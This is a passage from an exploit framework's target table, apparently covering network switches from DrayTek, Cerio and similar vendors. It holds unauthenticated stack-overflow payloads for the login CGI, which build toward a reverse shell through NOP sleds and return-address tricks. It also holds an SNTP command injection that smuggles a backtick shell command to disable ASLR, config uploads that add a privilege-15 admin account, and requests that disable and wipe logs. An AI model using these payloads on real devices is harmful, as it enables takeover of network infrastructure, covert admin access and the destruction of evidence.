We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t# Not vulnerable \r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',\t# Enable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&empty=1',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&target=0',\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&target=1',\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > 
/tmp/check`&port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'DrayTek': { \r\n\t\t\t\t'vendor': 'DrayTek Corp.',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak': True,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': 
True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&empty=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"_ds=1&target=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"_ds=1&target=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to 
verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'1',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + 
'&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntp=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > 
/tmp/check`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'delete_query':'{\"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntp=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t# Not vulnerable \r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',\t# Enable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&empty=1',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&target=0',\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&target=1',\t\t\t# 
Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Cerio': { \r\n\t\t\t\t'vendor': 'CERIO Corp.',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak': False,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&empty=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"_ds=1&target=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"_ds=1&target=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking 
authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mntlog/startup-config',\t\t\t# /mntlog instead of /mnt to verify\r\n\t\t\t\t\t\t\t'content_check':'/mntlog/startup-config',\t# /mntlog instead of /mnt to verify\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: 
Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'1',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': 
True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntp=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'delete_query':'{\"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntp=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to 
jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': 